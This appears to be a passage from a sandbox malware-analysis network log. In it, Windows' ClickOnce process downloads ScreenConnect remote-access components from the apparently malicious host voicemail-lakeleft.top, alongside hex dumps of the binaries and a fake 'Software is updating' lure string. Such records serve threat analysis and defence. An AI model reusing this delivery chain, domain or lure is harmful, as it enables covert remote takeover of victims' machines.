                                                                                                                                                                                                                                                  2024-11-08 10:01:05 UTC16384INData Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41
                                                                                                                                                                                                                                                  Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
                                                                                                                                                                                                                                                  2024-11-08 10:01:05 UTC16384INData Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41
                                                                                                                                                                                                                                                  Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
                                                                                                                                                                                                                                                  2024-11-08 10:01:05 UTC16384INData Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62
                                                                                                                                                                                                                                                  Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
                                                                                                                                                                                                                                                  2024-11-08 10:01:05 UTC16384INData Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 42 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 43 2f 6f 32 35 66 41 41 41 41 41 4f 45 41 41 41 41 67 51 51 42 77 41 48 41 41 62 41 42 70 41 47 4d 41 59 51 42 30 41 47 6b 41 62 77 42 75 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 41 41 41 41 41 41 41 54 35 54 62 32 5a 30 64 32 46 79 5a 53 42 70 63 79 42 31 63 47 52 68 64 47 6c 75 5a 79 34 75 4c 69 42 51 62 47 56 68 63 32 55 67 5a 47 38 67 62 6d 39 30 49 48 52 31 63 6d 34 67 62 32 5a 6d 49 48 6c 76 64 58 49 67 59 32 39 74 63 48 56 30
                                                                                                                                                                                                                                                  Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAABAAAAAAAAAFBBRFBBRFC/o25fAAAAAOEAAAAgQQBwAHAAbABpAGMAYQB0AGkAbwBuAFQAaQB0AGwAZQAAAAAAAT5Tb2Z0d2FyZSBpcyB1cGRhdGluZy4uLiBQbGVhc2UgZG8gbm90IHR1cm4gb2ZmIHlvdXIgY29tcHV0
                                                                                                                                                                                                                                                  2024-11-08 10:01:06 UTC16384INData Raw: 6e 32 53 49 53 73 41 52 4e 32 4b 78 43 42 6f 41 2f 69 54 74 74 53 4f 77 67 2b 39 44 36 47 36 52 49 48 51 2f 79 52 43 58 67 44 50 37 4f 4b 4a 71 78 47 49 49 43 51 41 2b 32 2f 65 30 48 59 6b 65 50 42 39 43 46 33 76 6e 57 48 55 4a 48 4a 65 41 73 2f 73 34 59 6d 72 45 59 67 67 4a 41 47 36 30 34 71 68 39 71 7a 6d 45 37 69 64 6c 53 32 41 45 48 4a 68 62 63 54 5a 69 63 51 49 4e 59 4a 36 4c 77 62 51 64 6c 78 2f 38 48 6b 4b 50 69 67 58 78 64 4a 62 79 64 78 45 77 6a 56 69 63 51 41 50 41 73 71 58 76 61 53 64 43 51 58 67 39 68 45 36 4c 78 58 43 6d 65 42 6c 48 64 41 4a 75 66 68 39 6a 49 78 59 6e 30 41 42 32 6d 55 52 58 2b 6e 35 68 35 50 4d 7a 46 49 78 42 38 54 4b 4f 2b 41 53 38 39 54 61 2b 52 69 78 4f 6f 41 48 4d 6e 6a 76 33 32 68 45 62 34 6f 50 48 6e 64 44 72 42 57 4e
                                                                                                                                                                                                                                                  Data Ascii: n2SISsARN2KxCBoA/iTttSOwg+9D6G6RIHQ/yRCXgDP7OKJqxGIICQA+2/e0HYkePB9CF3vnWHUJHJeAs/s4YmrEYggJAG604qh9qzmE7idlS2AEHJhbcTZicQINYJ6LwbQdlx/8HkKPigXxdJbydxEwjVicQAPAsqXvaSdCQXg9hE6LxXCmeBlHdAJufh9jIxYn0AB2mURX+n5h5PMzFIxB8TKO+AS89Ta+RixOoAHMnjv32hEb4oPHndDrBWN
                                                                                                                                                                                                                                                  2024-11-08 10:01:06 UTC3543INData Raw: 79 76 67 75 4a 45 58 51 41 41 4b 59 31 45 44 4b 75 66 68 6c 68 49 71 67 41 51 51 77 71 57 6b 63 39 2b 4f 58 45 5a 6f 45 44 53 43 41 53 51 32 6b 48 45 4d 58 6b 69 4a 6f 41 41 46 4d 36 67 72 63 37 30 4a 36 71 77 67 61 41 41 47 63 36 77 72 63 37 30 4a 36 61 42 49 30 41 41 49 34 31 30 44 4b 2b 43 36 6b 56 34 34 6e 67 41 41 6d 4e 59 30 6a 76 67 76 70 30 50 45 45 45 4d 41 6b 70 6e 47 4d 59 52 66 53 73 75 4d 4a 49 49 42 4a 58 49 48 48 73 41 76 70 32 50 45 45 45 4d 41 6b 72 73 42 6a 36 45 49 79 69 42 4a 41 41 4a 4d 61 53 42 6d 2f 43 38 6b 67 53 67 41 42 54 48 49 67 5a 66 77 75 4a 49 4d 6f 41 51 51 77 79 57 6b 63 4b 37 30 41 76 6d 38 51 4a 51 41 43 4f 4e 63 30 6a 6e 76 68 58 55 68 71 73 41 41 45 4d 4b 6b 72 38 47 70 38 46 35 49 61 4c 41 41 42 7a 48 55 37 74 33 51
                                                                                                                                                                                                                                                  Data Ascii: yvguJEXQAAKY1EDKufhlhIqgAQQwqWkc9+OXEZoEDSCASQ2kHEMXkiJoAAFM6grc70J6qwgaAAGc6wrc70J6aBI0AAI410DK+C6kV44ngAAmNY0jvgvp0PEEEMAkpnGMYRfSsuMJIIBJXIHHsAvp2PEEEMAkrsBj6EIyiBJAAJMaSBm/C8kgSgABTHIgZfwuJIMoAQQwyWkcK70Avm8QJQACONc0jnvhXUhqsAAEMKkr8Gp8F5IaLAABzHU7t3Q


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.549711194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:07 UTC104OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  2024-11-08 10:01:07 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 17866
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:06 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:07 UTC16168INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                                                  2024-11-08 10:01:07 UTC1698INData Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55
                                                                                                                                                                                                                                                  Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.549722194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:13 UTC106OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  2024-11-08 10:01:13 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 95520
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:12 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:13 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                                  2024-11-08 10:01:13 UTC16384INData Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00
                                                                                                                                                                                                                                                  Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                                                  2024-11-08 10:01:13 UTC16384INData Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b
                                                                                                                                                                                                                                                  Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                                                  2024-11-08 10:01:13 UTC16384INData Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39
                                                                                                                                                                                                                                                  Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
                                                                                                                                                                                                                                                  2024-11-08 10:01:13 UTC16384INData Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00
                                                                                                                                                                                                                                                  Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                  2024-11-08 10:01:14 UTC13816INData Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b
                                                                                                                                                                                                                                                  Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.549724194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:15 UTC138OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2024-11-08 10:01:15 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 61216
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:15 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:15 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
                                                                                                                                                                                                                                                  2024-11-08 10:01:15 UTC16384INData Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19
                                                                                                                                                                                                                                                  Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                                                                                                                  2024-11-08 10:01:15 UTC16384INData Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00
